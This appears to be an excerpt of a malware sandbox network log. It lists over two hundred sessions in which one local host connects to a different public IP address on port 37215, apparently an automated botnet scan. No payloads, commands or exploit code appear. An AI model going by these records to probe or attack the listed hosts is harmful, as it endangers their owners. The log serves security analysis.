                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17315192.168.2.1346618157.6.55.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17316192.168.2.1342052197.211.254.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17317192.168.2.134455441.39.113.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17318192.168.2.1352794155.145.203.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17319192.168.2.1345272157.136.148.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17320192.168.2.1344360157.76.131.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17321192.168.2.1346370157.196.221.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17322192.168.2.134449295.71.220.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17323192.168.2.1335650197.23.204.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17324192.168.2.1352466157.77.117.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17325192.168.2.1354442197.201.57.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17326192.168.2.1340646197.136.100.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17327192.168.2.133634618.162.34.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17328192.168.2.1349370157.180.250.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17329192.168.2.1340596197.87.243.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17330192.168.2.1350028167.244.88.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17331192.168.2.135081441.127.24.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17332192.168.2.1358826157.184.188.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17333192.168.2.1344400157.12.48.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17334192.168.2.1358094197.189.106.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17335192.168.2.1334824197.61.116.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17336192.168.2.1339204197.249.94.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17337192.168.2.134881846.74.178.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17338192.168.2.133394225.224.243.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17339192.168.2.133525257.42.158.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17340192.168.2.133933841.255.221.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17341192.168.2.1336890210.210.42.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17342192.168.2.1356442157.110.26.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17343192.168.2.1333548109.79.127.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17344192.168.2.136094641.59.58.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17345192.168.2.1360550157.178.169.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17346192.168.2.1346086157.182.204.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17347192.168.2.1336006197.182.50.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17348192.168.2.1337046197.106.33.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17349192.168.2.1345088126.182.239.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17350192.168.2.1335696197.151.134.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17351192.168.2.1358936197.74.233.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17352192.168.2.1359338157.203.246.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17353192.168.2.1336184157.121.109.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17354192.168.2.1345142157.31.130.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17355192.168.2.1349488157.82.247.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17356192.168.2.136067841.104.136.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17357192.168.2.1343488157.237.232.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17358192.168.2.135100447.62.19.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17359192.168.2.134138678.189.181.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17360192.168.2.1352484170.56.245.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17361192.168.2.134756441.68.182.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17362192.168.2.1346536157.53.196.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17363192.168.2.1356028197.51.138.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17364192.168.2.1336978197.230.227.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17365192.168.2.1360376197.134.12.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17366192.168.2.1341204197.12.90.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17367192.168.2.133829041.186.64.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17368192.168.2.1336330117.6.80.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17369192.168.2.1344852131.199.82.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17370192.168.2.1343122157.146.62.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17371192.168.2.1354180157.176.121.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17372192.168.2.1346114197.120.149.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17373192.168.2.1356416157.68.250.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17374192.168.2.1342458157.59.27.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17375192.168.2.133516041.183.195.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17376192.168.2.136068841.184.46.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17377192.168.2.1334362197.232.19.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17378192.168.2.1352372157.66.233.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17379192.168.2.1356474157.137.14.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17380192.168.2.1339318197.154.110.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17381192.168.2.133569441.50.118.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17382192.168.2.1338990157.233.244.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17383192.168.2.1332862197.230.91.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17384192.168.2.134489441.148.164.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17385192.168.2.1343320197.179.206.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17386192.168.2.1337456157.242.129.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17387192.168.2.135950841.201.126.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17388192.168.2.135451641.232.137.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17389192.168.2.1338912118.71.216.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17390192.168.2.1340700157.205.215.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17391192.168.2.1333138140.246.39.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17392192.168.2.1358874157.19.17.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17393192.168.2.13566742.86.144.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17394192.168.2.133673041.12.60.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17395192.168.2.1344746197.126.169.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17396192.168.2.1338538167.186.16.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17397192.168.2.1346794157.4.191.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17398192.168.2.134571685.236.190.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17399192.168.2.133503038.205.1.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17400192.168.2.1351304157.41.164.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17401192.168.2.1336524197.59.71.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17402192.168.2.135125641.157.136.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17403192.168.2.135062489.144.249.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17404192.168.2.135916846.71.38.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17405192.168.2.1343738197.99.61.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17406192.168.2.134897441.147.98.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17407192.168.2.133343441.95.18.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17408192.168.2.134537441.210.111.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17409192.168.2.1341484197.13.81.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17410192.168.2.134135265.118.21.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17411192.168.2.1339906179.19.178.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17412192.168.2.1352936157.54.1.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17413192.168.2.1349904197.88.203.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17414192.168.2.1357376157.174.9.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17415192.168.2.1351926116.217.10.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17416192.168.2.1343344197.58.159.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17417192.168.2.133620641.138.217.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17418192.168.2.1350426157.244.154.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17419192.168.2.1357336197.172.102.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17420192.168.2.1358248207.236.191.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17421192.168.2.134233241.76.51.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17422192.168.2.135313241.196.80.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17423192.168.2.1349576157.91.55.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17424192.168.2.1349326197.42.40.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17425192.168.2.135398441.155.174.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17426192.168.2.1334816157.26.145.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17427192.168.2.135247641.227.45.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17428192.168.2.134830641.194.161.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17429192.168.2.134649641.253.202.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17430192.168.2.1346548157.95.96.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17431192.168.2.135151841.175.192.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17432192.168.2.1350392197.76.69.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17433192.168.2.1337542157.238.74.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17434192.168.2.1336732157.1.170.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17435192.168.2.135399641.235.12.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17436192.168.2.1351694157.66.249.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17437192.168.2.1339390197.87.7.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17438192.168.2.134516641.4.221.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17439192.168.2.1345944197.26.250.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17440192.168.2.1336460197.213.244.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17441192.168.2.1358540197.102.11.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17442192.168.2.1344016197.130.139.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17443192.168.2.1356260162.88.151.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17444192.168.2.1349076197.133.130.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17445192.168.2.1352956197.81.44.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17446192.168.2.135877641.232.199.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17447192.168.2.1344034197.156.115.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17448192.168.2.1358480197.27.71.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17449192.168.2.1341146197.106.208.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17450192.168.2.1339674197.207.14.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17451192.168.2.1343042197.158.9.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17452192.168.2.1336782197.25.207.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17453192.168.2.135712841.221.51.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17454192.168.2.134749286.241.183.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17455192.168.2.135336693.109.143.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17456192.168.2.1350334197.63.217.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17457192.168.2.134818673.136.163.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17458192.168.2.1338506109.75.76.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17459192.168.2.1338054157.237.120.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17460192.168.2.134635441.86.228.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17461192.168.2.134807041.156.64.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17462192.168.2.136020441.160.67.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17463192.168.2.1339380197.196.246.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17464192.168.2.1336530157.242.117.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17465192.168.2.133306441.65.38.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17466192.168.2.1356332156.210.15.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17467192.168.2.1354352142.68.125.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17468192.168.2.134775241.14.104.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17469192.168.2.1340342128.129.82.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17470192.168.2.134719241.237.253.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17471192.168.2.1354196157.188.164.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17472192.168.2.1333204197.97.42.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17473192.168.2.1350980197.250.228.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17474192.168.2.134052041.171.38.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17475192.168.2.1349498114.115.104.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17476192.168.2.1347558154.185.19.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17477192.168.2.134452441.178.9.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17478192.168.2.133683041.124.223.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17479192.168.2.134890841.208.172.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17480192.168.2.134348441.94.183.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17481192.168.2.1343704197.21.79.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17482192.168.2.1342066157.109.247.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17483192.168.2.1349696197.102.151.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17484192.168.2.133870241.164.21.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17485192.168.2.1355340197.143.19.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17486192.168.2.135638241.124.191.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17487192.168.2.135206041.36.148.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17488192.168.2.133511894.83.190.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17489192.168.2.134526041.106.56.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17490192.168.2.1342664165.23.1.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17491192.168.2.1336176174.160.217.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17492192.168.2.133656882.171.94.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17493192.168.2.1343628157.115.57.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17494192.168.2.1354468157.222.61.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17495192.168.2.1340814197.72.153.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17496192.168.2.1343506157.39.141.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17497192.168.2.1340860197.118.88.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17498192.168.2.1352916157.119.4.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17499192.168.2.1343242157.145.156.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17500192.168.2.134792041.146.144.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17501192.168.2.1347304197.29.164.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17502192.168.2.133717641.197.212.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17503192.168.2.134825441.147.33.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17504192.168.2.1341688157.204.230.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17505192.168.2.1359122157.241.230.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17506192.168.2.134441841.181.178.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17507192.168.2.1342046197.255.240.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17508192.168.2.135816641.78.25.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17509192.168.2.1353586197.253.250.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17510192.168.2.1343634197.45.103.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17511192.168.2.1352722195.57.200.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17512192.168.2.1342724157.231.252.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17513192.168.2.133440041.112.243.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17514192.168.2.134294441.136.116.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17515192.168.2.1348182157.78.78.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17516192.168.2.135621841.216.33.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17517192.168.2.134097037.179.90.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17518192.168.2.1348146197.51.248.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17519192.168.2.134635857.70.200.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17520192.168.2.134514441.245.163.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17521192.168.2.1353370197.223.224.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17522192.168.2.1345558157.127.116.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17523192.168.2.1345280157.160.96.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
